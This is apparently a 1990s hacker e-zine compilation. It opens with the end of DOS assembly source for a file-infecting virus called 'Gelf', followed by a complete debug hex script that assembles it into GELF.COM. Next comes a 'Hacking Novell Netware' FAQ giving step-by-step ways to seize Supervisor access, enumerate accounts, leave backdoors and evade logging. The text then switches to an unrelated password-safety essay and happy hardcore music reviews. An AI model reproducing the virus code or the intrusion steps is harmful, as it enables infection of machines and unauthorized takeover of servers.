mov dx, 0000h
int 21h
jc RestoreAttribs
mov ah, 40h
mov cx, 0003h
lea dx, [bp + jumpbytes]
int 21h
RestoreAttribs: mov ax, 4301h
mov cx, word ptr [bp + VirusEnd + 15h]
lea dx, [bp + VirusEnd + 1Eh]
int 21h
mov ax, 5701h
mov cx, word ptr [bp + VirusEnd + 16h]
mov dx, word ptr [bp + VirusEnd + 18h]
int 21h
Close: mov ah, 3Eh
int 21h
FindMore: mov ah, 4Fh
jmp findnext
RestoreDTA: mov ah, 1Ah
mov dx, 0080h
int 21h
mov ax, 0100h
push ax
ret
DoParent: mov ah, 3Bh
lea dx, Dot_Dot
int 21h
jc RestoreDir
jmp FindFirst
RestoreDir: mov ah, 3Bh
lea dx, Slash
int 21h
jmp RestoreDTA
FileMask db '*.com', 00h
Slash db '\'
CurrentDir db 64 dup (0)
Dot_Dot db '..', 00h
Buffer db 0CDh, 20h, 00h
JumpBytes db 0E9h, 00h, 00h
VirusInfo db '[Gelf] Virus written by EXE-Gency!$'
VirusEnd:
Prog ends
end main
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
If you don't have TASM/TLINK, just copy and past the debug script below to a
new text file and then type:
debug < filename
and a file called gelf.com will appear. This is the virus so be careful.
N GELF.COM
E 0100 E9 00 00 E8 00 00 5D 81 ED 06 01 B4 2A CD 21 81
E 0110 FA 01 01 75 0D B4 09 BA 82 02 CD 21 B4 01 CD 21
E 0120 CD 19 E8 17 00 EB 28 90 00 00 E8 0F 00 B4 40 B9
E 0130 A2 01 8D 96 03 01 CD 21 E8 01 00 C3 3E 8B 9E 28
E 0140 01 8D B6 4F 01 B9 71 00 31 1C 46 46 E2 FA C3 8D
E 0150 B6 7C 02 BF 00 01 A4 A5 B4 1A 8D 96 A5 02 CD 21
E 0160 B4 47 B2 00 BE 39 02 CD 21 B4 4E 8D 96 32 02 B9
E 0170 00 00 CD 21 73 03 E9 A4 00 B8 01 43 B9 00 00 8D
E 0180 96 C3 02 CD 21 73 03 E9 82 00 B8 02 3D 8D 96 C3
E 0190 02 CD 21 72 56 93 B4 3F B9 03 00 8D 96 7C 02 CD
E 01A0 21 72 48 3E 80 BE 7C 02 E9 74 40 B8 02 42 B9 00
E 01B0 00 BA 00 00 CD 21 72 33 2D 03 00 3E 89 86 80 02
E 01C0 B4 2C CD 21 02 D6 83 FB 00 74 F5 3E 89 9E 28 01
E 01D0 E8 57 FF B8 00 42 B9 00 00 BA 00 00 CD 21 72 0B
E 01E0 B4 40 B9 03 00 8D 96 7F 02 CD 21 B8 01 43 3E 8B
E 01F0 8E BA 02 8D 96 C3 02 CD 21 B8 01 57 3E 8B 8E BB
E 0200 02 3E 8B 96 BD 02 CD 21 B4 3E CD 21 B4 4F E9 61
E 0210 FF B4 1A BA 80 00 CD 21 B8 00 01 50 C3 B4 3B BA
E 0220 79 02 CD 21 72 03 E9 40 FF B4 3B BA 38 02 CD 21
E 0230 EB DF 2A 2E 63 6F 6D 00 5C 00 00 00 00 00 00 00
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0270 00 00 00 00 00 00 00 00 00 2E 2E 00 CD 20 00 E9
E 0280 00 00 5B 47 65 6C 66 5D 20 56 69 72 75 73 20 77
E 0290 72 69 74 74 65 6E 20 62 79 20 45 58 45 2D 47 65
E 02A0 6E 63 79 21 24
RCX
01A5
W
Q
_____ _____ ___ ___ __ __
/ | \| _ \ \ \/ /| | |
/ \ __/ \ / | | |
\ / | \ / | | |
\_____/|__| \/ |__|__|
PRESENTS:
Hacking Novell Netware
By Husoft
Section 00
General Info
00-1. What is this "FAQ" for?
00-2. What is the origin of this FAQ and how do I add to it?
U 00-3. Is this FAQ available by anonymous FTP or WWW?
---------------------------------------------------------------------------
Section 01
Access to Accounts
U 01-1. What are common accounts and passwords in Novell Netware?
U 01-2. How can I figure out valid account names on Novell Netware?
01-3. What is the "secret" method to gain Supervisor access Novell used to
teach in CNE classes?
01-4. What is the cheesy way to get Supervisor access?
01-5. How do I leave a backdoor?
N 01-6. I don't have SETPWD.NLM or a disk editor. How can I get Supe access?
---------------------------------------------------------------------------
Section 02
Passwords
02-1. How do I access the password file in Novell Netware?
02-2. How do I crack Novell Netware passwords?
N 02-3. What is a "brute force" password cracker?
N 02-4. What is a "dictionary" password cracker?
02-5. How do I use SETPWD.NLM?
02-6. What's the "debug" way to disable passwords?
N 02-7. Exactly how do passwords get encrypted?
---------------------------------------------------------------------------
Section 03
Accounting and Account Security
03-1. What is Accounting?
03-2. How do I defeat Accounting?
03-3. What is Intruder Detection?
N 03-4. How do I check for Intruder Detection?
U 03-5. What are station/time restrictions?
03-6. How do I spoof my node or IP address?
---------------------------------------------------------------------------
Section 04
The Console
04-1. How do I defeat console logging?
04-2. Can I set the RCONSOLE password to work for just Supervisor?
N 04-3. How can I get around a locked MONITOR?
---------------------------------------------------------------------------
Section 05
File and Directory Access
05-1. How can I see hidden files and directories?
05-2. How do I defeat the execute-only flag?
05-3. How can I hide my presence after altering files?
05-4. What is a Netware-aware trojan?
05-5. What are Trustee Directory Assignments?
05-6. Are there any default Trustee Assignments that can be exploited?
05-7. What are some general ways to exploit Trustee Rights?
05-8. Can access to .NCF files help me?
---------------------------------------------------------------------------
Section 06
Fun with Netware 4.1
06-1. What is interesting about Netware 4.x's licensing?
N 06-2. How can I tell if something is being Audited?
N 06-3. Where are the Login Scripts stored and can I edit them?
N 06-4. What is the rumored "backdoor" in NDS?
N 06-5. How can I remove NDS?
N 06-6. How can I remove Auditing if I lost the Audit password?
N 06-7. Does 4.x store the LOGIN password to a temporary file?
N 06-8. Everyone can make themselves equivalent to anyone including Admin.
How?
N 06-9. Can I reset an NDS password with just limited rights?
N 06-10. What is OS2NT.NLM?
N 06-11. Do you have to be Admin equivalent to reset a password?
---------------------------------------------------------------------------
Section 07
Miscellaneous Info on Netware
07-1. Why can't I get through the 3.x server to another network via TCP/IP?
07-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF?
07-3. How can I login without running the System Login Script?
07-4. How do I remotely reboot a Netware 3.x file server?
07-5. How can I abend a Netware server? And why?
07-6. What is Netware NFS and is it secure?
07-7. Can sniffing packets help me break in?
N 07-8. What else can sniffing get me?
07-9. How does password encryption work?
N 07-10. Are there products to help improve Netware's security?
07-11. What is Packet Signature and how do I get around it?
N 07-12. Do any Netware utilities have holes like Unix utilities?
---------------------------------------------------------------------------
Section 08
Resources
U 08-1. What are some Netware FTP locations?
08-2. Can I get files without FTP?
U 08-3. What are some Netware WWW locations?
08-4. What are some Netware USENET groups?
08-5. What are some Netware mailing lists?
08-6. Where are some other Netware FAQs?
U 08-7. Where can I get the files mentioned in this FAQ?
08-8. What are some good books for Netware?
---------------------------------------------------------------------------
Section 09
Netware APIs
09-1. Where can I get the Netware APIs?
U 09-2. Are there alternatives to Netware's APIs?
---------------------------------------------------------------------------
Section 10
For Administrators Only
U 10-1. How do I secure my server?
10-2. I'm an idiot. Exactly how do hackers get in?
N 10-3. I have xxx setup and xxx version running. Am I secure?
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Section 00
General Info
---------------------------------------------------------------------------
00-1. What is this "FAQ" for?
This FAQ contains information about hacking Novell Netware. It is intented to
show what and how regarding hacking on Netware, and by illustrating this in
explicit detail show how sys admins can improve security and prevent break-ins.
Most of the information in this FAQ was compiled and collected from various
sources freely available on the Internet. In fact, most of the information here
is OLD info for serious Netware hackers. Some of the info was collected from
these serious Netware hackers, and still more was collected from "tiger team"
security sweeps that I have been involved in.
You will also find hints and generally good ideas for improving and/or expanding
an existing system. This FAQ is a good reference for sys admins as well as
hackers.
---------------------------------------------------------------------------
00-2. What is the origin of this FAQ and how do I add to it?
Send comments about info in this FAQ to thegnome@fastlane.net. Simple flames
about typos, the "that's not right" one liners will be ignored. If you wish to
contribute corrections please include your research and source of facts. Also
if you wish to add your information, I will include it if I can include your
email address, unless I can verify the info independently. This way if someone
has questions, they can bug you, not me.
---------------------------------------------------------------------------
00-3. Is this FAQ available by anonymous FTP or WWW?
Look for it in the following locations:
jumper.mcc.ac.uk /pub/security/netware faq.zip
ftp.fastlane.net /pub/nomad/nw faq.zip
ftp.best.com /pub/almcepud/hacks faq.zip
ftp://infonexus.com/pub/Philes/FAQS/netwareHack.faq.txt.gz
http://resudox.net/bio/mainpage.html in the Netware section.
Entire FAQ Online, and the reason Al has fits with his ISP ;-):
http://www.interlog.com/~apayne/nwhack.html
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Section 01
Access to Accounts
---------------------------------------------------------------------------
01-1. What are common accounts and passwords in Novell Netware?
Out of the box Novell Netware has the following default accounts -
SUPERVISOR, GUEST, and Netware 4.x has ADMIN and USER_TEMPLATE as well. All
of these have no password to start with. Virtually every installer quickly
gives SUPERVISOR and ADMIN a password. However, many locations will create
special purpose accounts that have easy-to-guess names, some with no
passwords. Here are a few and their typical purposes:
Account Purpose
---------- ------------------------------------------------------
PRINT Attaching to a second server for printing
LASER Attaching to a second server for printing
HPLASER Attaching to a second server for printing
PRINTER Attaching to a second server for printing
LASERWRITER Attaching to a second server for printing
POST Attaching to a second server for email
MAIL Attaching to a second server for email
GATEWAY Attaching a gateway machine to the server
GATE Attaching a gateway machine to the server
ROUTER Attaching an email router to the server
BACKUP May have password/station restrictions (see below), used
for backing up the server to a tape unit attached to a
workstation. For complete backups, Supervisor equivalence
is required.
WANGTEK See BACKUP
FAX Attaching a dedicated fax modem unit to the network
FAXUSER Attaching a dedicated fax modem unit to the network
FAXWORKS Attaching a dedicated fax modem unit to the network
TEST A test user account for temp use
ARCHIVIST Palidrome default account for backup
CHEY_ARCHSVR An account for Arcserve to login to the server from
from the console for tape backup. Version 5.01g's
password was WONDERLAND. Delete the Station
Restrictions and use SUPER.EXE to toggle this
account and you have an excellent backdoor.
WINDOWS_PASSTHRU Although not required, per the Microsoft Win95
Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you
need this for resource sharing without a password.
This should give you an idea of accounts to try if you have access to a
machine that attaches to the server. A way to "hide" yourself is to give
GUEST or USER_TEMPLATE a password. Occassionally admins will check up on
GUEST, but most forget about USER_TEMPLATE. In fact, _I_ forgot about
USER_TEMPLATE until itsme reminded me.
---------------------------------------------------------------------------
01-2. How can I figure out valid account names on Novell Netware?
Any limited account should have enough access to allow you to run SYSCON,
located in the SYS:PUBLIC directory. If you get in, type SYSCON and enter.
Now go to User Information and you will see a list of all defined accounts.
You will not get much info with a limited account, but you can get the
account and the user's full name.
If your in with any valid account, you can run USERLST.EXE and get a list
of all valid account names on the server.
If you don't have access (maybe the sys admin deleted the GUEST account,
a fairly common practice), you can't just try any account name at the LOGIN
prompt. It will ask you for a password whether the account name is valid or
not, and if it is valid and you guees the wrong password, you could be
letting the world know what you're up to if Intruder Detection is on. But
there is a way to determine if an account is valid.
From a DOS prompt use a local copy (on your handy floppy you carry
everywhere) of MAP.EXE. After you've loaded the Netware TSRs up through
NETX or VLM, Try to map a drive using the server name and volume SYS:.
For example:
MAP G:=TARGET_SERVER/SYS:APPS <enter>
Since you are not logged in, you will be prompted for a login ID. If it
is a valid ID, you will be prompted for a password. If not, you will
immediately receive an error. Of course, if there is no password for the
ID you use you will be attached and mapped to the server. You can do the
same thing with ATTACH.EXE:
ATTACH TARGET_SERVER/loginidtotry <enter>
The same thing will happen as the MAP command. If valid, you will be
prompted for a password. If not, you get an error.
Another program to check for valid users and the presence of a password is
CHKNULL.EXE by itsme. This program checks for users and whether they have
a password assigned.
In 4.1 CHKNULL shows you every account with no password and you do not
have to be logged in. For this to work bindery emulation must be on. But
there is another way to get them in 4.1:
Once you load up the VLMs you may be able to view the entire tree, or at
least all of the tree you could see if logged in. Try this:
CX /T /A /R
During the installation of 4.1, [Public] has browse access to the entire
tree because [Public] is added to [Root] as a Trustee. The Inherited Rights
Filter flows this stuff down unless explicitly blocked. If you have the VLMs
loaded and access to CX, you don't even have to log in, and you can get the
name of virtually every account on the server.
---------------------------------------------------------------------------
01-3. What is the "secret" method to gain Supervisor access Novell used to teach
in CNE classes?
Before I start this section, let me recommend another solution, my God, ANY
other solution is better than this! If you are running 3.x, jump to the end of
this section.
The secret method is the method of using a DOS-based sector editor to edit the
entry in the FAT, and reset the bindery to default upon server reboot. This gives
you Supervisor and Guest with no passwords. The method was taught in case you
lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts
created. It also saves the server from a wipe and reboot in case the Supervisor account is corrupt, deleted, or trashed.
While you get a variety of answers from Novell about this technique, from it
doesn't work to it is technically impossible, truth be it it can be done. Here
are the steps, as quoted from comp.os.netware.security, with my comments in
[brackets]:
[start of quote]
A Netware Server is supposed to be a very safe place to keep your files. Only
people with the right password will have access to the data stored there. The
Supervisor (or Admin) user's password is usually the most well kept secret in
the company, since anyone that has that code could simply log to the server and
do anything he/she wants.
But what happens if this password is lost and there's no user that is
security-equivalent to the supervisor? [Use SETPWD.NLM, instead of this process,
see section 02-3 - S.N.] What happens if the password system is somehow damaged
and no one can log to the network? According to the manual, there's simply no
way out. You would have to reinstall the server and try to find your most recent
backup.
Fortunately, there is a very interesting way to gain complete access to a Netware
server without knowing the Supervisor's (or Admin's) password. You may imagine
that you would have to learn complex decryption techniques or even type in a long
C program, but that's not the case. The trick is so simple and generic that it
will work the same way for Netware 2.x, 3.x and 4.x.
The idea is to fool Netware to think that you have just installed the server and
that no security system has been estabilished yet. Just after a Netware 2.x or
3.x server is installed, the Supervisor's password is null and you can log in
with no restriction. Netware 4.x works slightly differently, but it also allows
anyone to log in after the initial installation, since the installer is asked to
enter a password for the Admin user.
But how can you make the server think it has just been installed without
actually reinstalling the server and losing all data on the disk? Simple. You
just delete the files that contain the security system. In Netware 2.x, all
security information is stored in two files (NET$BIND.SYS and NET$BVAL.SYS).
Netware 3.x stores that information in three files (NET$OBJ
.SYS, NET$VAL.SYS and
NET$PROP.SYS). The all new Netware 4.x system stores all login names and
passwords in five different files (PARTITIO.NDS, BLOCK.NDS, ENTRY.NDS, VALUE.NDS
and UNINSTAL.NDS [This last file may not be there, don't worry - S.N.]).
One last question remains. How can we delete these files if we don't have access
to the network, anyway? The answer is, again, simple. Altough the people from
Novell did a very good job encrypting passwords, they let all directory
information easy to find and change if you can access the server's disk directly,
using common utilities like Norton's Disk Edit. Using this utility as an example,
I'll give a step-by-step procedure to make these files vanish. All you need is a
bootable DOS disk, Norton Utilities' Emergency Disk containing the DiskEdit
program and some time near the server.
1. Boot the server and go to the DOS prompt. To do this, just let the network
boot normally and then use the DOWN and EXIT commands. This procedure does not
work on old Netware 2.x servers and in some installations where DOS has been
removed from memory. In those cases, you'll have to use a DOS bootable disk.
2. Run Norton's DiskEdit utility from drive A:
3. Select "Tools" in the main menu and then select "Configuration". At the
configuration window, uncheck the "Read-Only" checkbox. And be very careful with
everything you type after this point.
4. Select "Object" and then "Drive". At the window, select the C: drive and make
sure you check the button "physical drive". After that, you'll be looking at your
physical disk and you be able to see (and change) everything on it.
5. Select "Tools" and then "Find". Here, you'll enter the name of the file you
are trying to find. Use "NET$BIND" for Netware 2, "NET$PROP.SYS" for Netware 3 and "PARTITIO.NDS" for Netware 4. It is possible that you find these strings in a
place that is not the Netware directory. If the file names are not all near each
other and proportionaly separated by some unreadable codes (at least 32 bytes
between them), then you it's not the place we are looking for. In that case,
you'll have to keep searching by selecting "Tools" and then "Find again". [In
Netware 3.x, you can change all occurences of the bindery files and it should
still work okay, I've done it before. - S.N.]
6. You found the directory and you are ready to change it. Instead of deleting
the files, you'll be renaming them. This will avoid problems with the directory
structure (like lost FAT chains). Just type "OLD" over the existing "SYS" or
"NDS" extension. Be extremely careful and don't change anything else.
7. Select "Tools" and then "Find again". Since Netware store the directory
information in two different places, you have to find the other copy and change
it the same way. This will again prevent directory structure problems.
8. Exit Norton Disk Edit and boot the server again. If you're running Netware 2
or 3, your server would be already accessible. Just go to any station and log in
as user Supervisor. No password will be asked. If you're running Netware 4, there
is one last step.
9. Load Netware 4 install utility (just type LOAD INSTALL at the console prompt)
and select the options to install the Directory Services. You be prompted for the
Admin password while doing this. After that, you may go to any station and log in
as user Admin, using the password that you have selected.
What I did with Norton's Disk Edit could be done with any disk editing utility
with a "Search" feature. This trick has helped me save many network supervisors
in the last years. I would just like to remind you that no one should break into
a netware server unless authorized to do it by the company that owns the server.
But you problably know that already.
[end of quote]
I actually had this typed up but kept changing it, so I stole this quote from
the newsgroup to save me retyping ;-)
Now the quicky for 3.x users. Use LASTHOPE.NLM, which renames the bindery and
downs the server. Reboot and you have Supe and Guest, no password.
---------------------------------------------------------------------------
01-4. What is the cheesy way to get Supervisor access?
The cheesy way is the way that will get you in, but it will be obvious to the
server's admin that the server has been compromised. This technique works for
3.11.
Using NW-HACK.EXE, if the Supervisor is logged in NW-HACK does the following
things. 1) The Supervisor password is changed to SUPER_HACKER, 2) every account
on the server is made a supe equivalent, and 3) the sys admin is going to know
very quickly something is wrong. What the admin will do is remove the supe rights
from all accounts that are not supposed to have it and change the Supervisor
password back. The only thing you can do is leave a backdoor for yourself (see
next question).
---------------------------------------------------------------------------
01-5. How do I leave a backdoor?
Once you are in, you want to leave a way back with supe equivalency. You can use
SUPER.EXE, written for the express purpose of allowing the non-supe user to
toggle on and off supe equivalency. If you use the cheesy way in (previous
question), you turn on the toggle before the admin removes your supe
equivalency. If you gain access to a supe equivalent account, give Guest supe
equivalency and then login as Guest and toggle it on. Now get back in as the
original supe account and remove the supe equivalency. Now Guest can toggle on
supe equivalency whenever it's convenient.
Of course Guest doesn't have to be used, it could be another account, like an
account used for e-mail administration or an e-mail router, a gateway's account,
you get the idea.
Now SUPER.EXE is not completely clean. Running the Security utility or Bindfix
will give away that an account has been altered at the bindery level, but the
only way for an admin to clear the error is to delete and rebuild the account.
Another backdoor is outlined in section 02-2 regarding the replacement LOGIN.EXE
and PROP.EXE
---------------------------------------------------------------------------
01-6. I don't have SETPWD.NLM or a disk editor. How can I get Supe access?
If you have two volumes or some unallocated disk space you can use this
hack to get Supe. Of course you need physical access but it works. I got
this from a post in comp.os.security.netware
- Dismount all volumes
- Rename SYS: to SYSOLD:
- Rename VOL1: (or what ever) to SYS: or create new SYS: on new disk
- Reboot server
- Mount SYS: and SYSOLD:
- Attach to server as Supervisor (Note: login not available)
- Rename SYSOLD:SYSTEM\NET$***.SYS to NET$****.OLD
- Dismount volumes
- Rename volume back to correct names
- Reboot server
- Login as Supervisor, no password due to new bindery
- Run BINDREST
- You are currently logged in as Supe, you can create a new user as
Supe equiv and use this new user to reset Supe's password, whatever.
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Section 02
Passwords
---------------------------------------------------------------------------
02-1. How do I access the password file in Novell Netware?
Contrary to not-so-popular belief, access to the password file in Netware is
not like Unix - the password file isn't in the open. All objects and their
properties are kept in the bindery files on 2.x and 3.x, and kept in the NDS
database in 4.x. An example of an object might be a printer, a group, an
individual's account etc. An example of an object's properties might include
an account's password or full user name, or a group's member list or full
name. The bindery files attributes (or flags) in 2.x and 3.x are Hidden
and System, and these files are located on the SYS: volume in the SYSTEM
subdirectory. Their names are as follows:
Netware version File Names
--------------- ----------
2.x NET$BIND.SYS, NET$BVAL.SYS
_____ _____ ___ ___ __ __
/ | \| _ \ \ \/ /| | |
/ \ __/ \ / | | |
\ / | \ / | | |
\_____/|__| \/ |__|__|
PRESENTS:
Password Security: The Core of Protection
By: HuSoft
Virtualy every computer service to which you log in employs a simple password protection scheme. Your account is assigned a unique user name and a password, both of which you must type in order to log in.
Generally, the system administration staff will allow (and even encourage) you to change your own password; some systems employs automated processes that insist that you make such changes periodically.
One of the simplest ways that intruders compromise password security is by repetitively trying possible passwords against known valid user ID's. This process can be conducted via automated process; the intruder uses a computer program to attempt the break-in. One scheme, sometimes called "attack guessing" tries to determine a real password by seeing if any of a long list of candidate passwords in fact allows entry. Most systems will hang up a connection after a several failed attempts to log in, but they may not detect repeated connections. Moreover, it is relatively common for Unix password files to be available to prying eyes. This is possible because these files are encrypted, so possession of the file does not equate to discovery of passwords. However, once a password file is in the hands of a would-be intruder, special "cracker" software will repetitively encrypt candidate passwords and try them against the encrypted form.
There are some straightfoward rules fo account and password administration, but many users fail to take heed. If you follow these rules, the chances of your account being compromised are greatly reduced. If you fail to follow these rules, you are asking for trouble.
1. Pick a password that does not relate in some obvious way to you. Do not use the name of your spouse, your child, or your pet. Do not use your initials, your telephone number, or your mascot of your alma mater. These pieces of information may be much more publick than you realice.
2. It is best to choose a word that is not a real word in any language. Some "attack guesing" schemes check to see if words out of standard dictionaries happen to match your password. A good approach is to pick the first letter of each word of a sentence that only you would devise.
3. Opt for a longer password over a short one. If your system allows eight character passwords, use all eight characters instead for three or four. Shorter passwords are more easily matched by cracker programs. If your system allows you to use mixed case letters as well as special characters, this can also make the password harder to crack. (It can also make the password harder to remember).
4. If you write a password down, put the paper copy in a secure place. Some guidelines suggest that you never write down a password, but the practical realty is that humans inevitably will do this.
5. Do not reveal your password to anyone. A new generation of network conartist sometimes employs the scam of masquerading as a security expert trying to catch an intruder, if only you will assist by providing your password. Don't fall for it.
6. Do not use the same password on multiple services. This rule is especially important, and especially often ignored. You cannot trust that all system administrators will protect your password. In particular, a dial-up bulletin board service run by a lone sysop out of his bedroom is not likely to have the same level of security as a major Internet service provider. In the event of a major break-in, your password becomes the key to all the systems you have access to-unless you vary password used on diferent services.
7. If you have any reason to believe a password has been compromised, change it immediately. Change passwords frequently in any event.
8. Most systems will provide you with information as the last time you logged in, as well as the last time someone attempt to log in, but failed. This is usefull information - but the tendency is to let it scroll by unread. If you notice activity that doesn't correspond to your logins, change your password and contact your system administrator.
If you become an information provider running your own system, there are some special points to consider:
1. Some computer operating systems are delivered with a set of "stock" initial passwords. Unless you change these passwords - all of them - you are exposed to a very simple attack from someone who has the manuals for the same system.
2. When you are away from the system you administer, be very cautious about logging in over the internet using secure passwords. An unscrupulous local administrator or user could be listening in. Consider isolating your everyday tasks, suck as reading mail, on a user ID that has no special privileges.
3. Many computer systems offer logging facilities that allow you to inspect patterns of use and abuse - for instance repeatedly failed login attempts. Use these tools to keep your eyes out for intruders. Use both the loggin facilities of the native operating system and whatever tools you may install.
4. Most corporate and campus networks have network administrators whose jobs include security. Ask your network administrator to audit your system setup to be sure it is secure. Also ask your network administrator to sign you up for local distrubution of the Computer Emergency Response Team (CERN) mailing list. These reports detail specific weaknesses discovered in various flavors of various operating systems, and they tell system administrators how to work arround these flaws while waiting for vendor responses.
5. If you install public client programs - programs that allow users to avail themselves of services without authentication - make sure the environment opened to these users is secure. Watch for openings in programs like more and telnet that may allow users more privilege than you want to offer to users whose identity is not known. *Your local network administrator should be able to offer advice.
The basic mode of operation of Ethernet and other local area networks that employ shared media implies a certain inherent opportunity for intruders to "sniff" passwords. On large corporate and campus networks, this exposure can be isolated to departments or buidings through the use of routers. In some cases, where security of communication across a campus or wide-area links is essential, network administrators may acquire and install routers with builtin encryption capability. If you work on a campus or corporate network, and you are concerned about this aspect of security, ask your LAN or campus network administrator for detalis as the level of exposure.
_____ _____ ___ ___ __ __
/ | \| _ \ \ \/ /| | |
/ \ __/ \ / | | |
\ / | \ / | | |
\_____/|__| \/ |__|__|
PRESENTS:
TRACKED MUSIC REVIEWS
~~~~~~~~~~~~~~~~~~~~~
By: Walrus & CrossFire
This section is running in conjunction with http://walrus.bog.net/. All of the tunes and mixes reviewed by me (Walrus) are available for listening or downloading from my site. Tracks that CrossFire reviews may also be there, but no promises. Where possible, a URL will be supplied. Well that's the theory anyway. A big shout goes out to Emulation who had donated 500Mb of server space on http://www.oldskool-hardcore.i12.com/ to allow this to continue, and to frOsty who is hosting a few of the mixes on http://www.tbp.mb.ca/audio/. Thanks to both of them.
Not all the tracks and mixes that we review are happy hardcore. We review oldskool, techno, drum 'n' bass, trance and more. Yes, even Gabber. Although we tend to stick to hardcore. If you would like either of us to review any tracks or mixes, send mods/mp3s/vqfs/realaudios or whatever your chosen format is to up_reviews@hotmail.com and either me or CrossFire will review it. Please don't send huge files though. For example, sending a 1 hour mix in mp3 format is not appropriate. If you want an address to send records/CDs/tapes to, just drop one of us an email.
This month's reviews:
~~~~~~~~~~~~~~~~~~~~~
Title: DJ Dodgee - Untitled mixtape 2
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Happy Hardcore
Tracklist:
Kaos & Darkcyde - Tubular Vibes
BDB feat. Lisa A - I Want You
2 Mental - Generation Love
E-Logic - The Gate
Class of '94 - Lift You One Stage Higher
Robbie Long & Devestate feat. Leroy - Flip Flop Flava
Brisk & Trixxy - Eye Opener (Brisk '99 remix)
Hixxy - Starry Night
Slipmatt & Eruption - Bust The New Jam (Brisk remix)
B'n'H vol.1
Supernova - Go DJ
Bang - Give Me A Reason
Vinylgroover - John Gotti's Revenge
Tayla & Blade - Hamburg
Rapido - Ultraviolet
Bang - Hyperspace
When I reviewed one of Dodgee's mixes in the last issue, I said: "Expect to see more from Dodgee, with a slightly more refined sound". That more refined sound is very apparant on this tape. The mixing is smoother overall. The punches are better, and there's even more of that excellent scratching. As for the tracks, there's an absolutely excellent selection of tracks in there. Not much to keep the cheezers happy though, so if that's your style give it a miss, but overall this tape comes highly reccomended.
Title: DJ Skippy - Awakening
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Happy Hardcore
This track by DJ Skippy has not (yet) been scheduled for release, but may appear on a Skippin Trax release sometime in the future. Its a fairly trancey affair which sounds a little like the Braveheart theme. There's nice little synth lines dropped in all over the place intersperced with pianos and the like, and every time I listen to it, I seem to hear something which I didn't notice first time round. This is an absolutely solid tune in my opinion. Deserves to be released as soon as possible.
Title: DJ Skippy - Skippin Trax 002
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Happy Hardcore
Skippin Trax 002 is going to have 3 tracks on it, and will probably be released in mid-late November. I have reviewed 2 of the tracks from it here, as the other one hasn't been written/recorded yet.
Side A (Energy 2000) is a happy, bouncey track using a few well known samples ("spread out and scatter" anybody?). Lots of different stuff going on here, but not fragmented. The track manages to be very happy without being cheezy. There's even some nice stompy bassdrum in there to shake the floor with.
Side B (Mystery) starts off with some good breakbeats and basslines and bounces along nicely with a few little vocal samples before bringing in some trancy synths. The track really picks up with a big bassdrum fill and bounces along with the same trancey synths until it picks up the breakbeats again for the outro.
On the basis of the two tracks I have reviewed here (remember there's going to be another one on there too) I advise anybody who likes their happy hardcore to go out and buy this record when it is released.
Title: DJ Sparkey - Hardcore Crazy
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Happy Hardcore/Gabber
This is a cool track. At 210bpm and with its hard loud kickdrums at the beginning, its fairly gabber-esque. But at the same time there's an element of happy hardcore in there. Although it does seem to lack something where the piano line is introduced, it quickly picks up, and regains a lot of the harder elements of the track. I haven't really heard anybody mix happycore and gabber together like this before, and it works surprisingly well.
Don't forget to check out Sparkey's show on Inside Beat. Check out www.inside-beat.net for details of tuning in.
Title: DJ Sparkey - Hardcore Frills
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Happy Hardcore
This track starts off a bit weak, with a single piano line, but improves as basslines and breakbeats are added to it. For a while it sounds fairly cool. However the track just loses it somewhere along the line, and never really goes anywhere. It ends up as a fairly cheezy afair. Its OK, but Hardcore Crazy is a much better track.
Title: DJ Smurf - Gabba Dabba Doo - 160 Shits Per Minute (Mixtape)
Reviewed by: CrossFire
Available from: Email smurf: Glen_Peterson@qsp.co.uk
Style: Gabber
TrackListing:
Dr Macabre - Ghost Stories (Powerplant)
Omar Santana - Digital Domain (H2OH)
The Horrorist - Flesh Is The Fever (Things To Come)
Boombastic - Leaders Of The New School (Baby Boom)
DJ Promo - Guns & Ammo (ID&T)
DJ Sim - Simbiosis (ID&T)
The Masochist - Cold Cage (ID&T)
Bass D & King Matthew - How Shall I (ID&T)
Rotterdam Terror Corps - Beethoven On XTC (Dark Twins Remix) (Megarave)
Doomaniac - Beat On Da Kick Drum (Mindcrash)
Dr Macabre - Danse Macabre (Megarave)
Members Of Megarave - Maniac (Megarave)
Evil Activities - Darkness Of Noom (Rotterdam)
DJ Mad E Fact - The Hustle (Baby Boom)
Damien Kelly & Attic & Stylz - State Of The Nation (Hollow Point)
Damien Kelly & The Unknown MC - The People Want More (Hollow Point)
Mmm, This is an interesting one this is - or maybe I'm just refering to the image on the cover, which features a pic of a woman with her arse out :) The Mixing, As Always With Smurf, Is Excellent, and the tape has some *brilliant* Tunage On There. What I am surprised about is the fact the tape is quite slow - 160 Bpm. Theres a few tracks on there I've heard on Happy Hardcore tapes, most notably Bass D & King Matthew - How Shall I, and Damien Kelly & Attic & Stylz - State Of The Nation. Overall this is an excellent tape, which proves smurf is one to look out for.
Title: Andreas Viklund - Sweet Things
Reviewed by: CrossFire
Available from: http://www.traxinspace.com (Title Search)
Style: Dance-Pop
Oh Yes! This Starts off with some nice pianos, before dipping into a vengaboys-esque intro (I don't Mean that in a bad way) , and then breaking down into the main melody. The whole song is really cutesy, but cutesy in a good way. Overall I think this track is excellent - Nice One Mr Viklund!
Title: Xentar - Tears Of Happiness
Reviewed by: CrossFire
Available from: ftp://ftp.scene.org/pub/music/groups/te/te-tears.zip
Style: Happy Hardcore
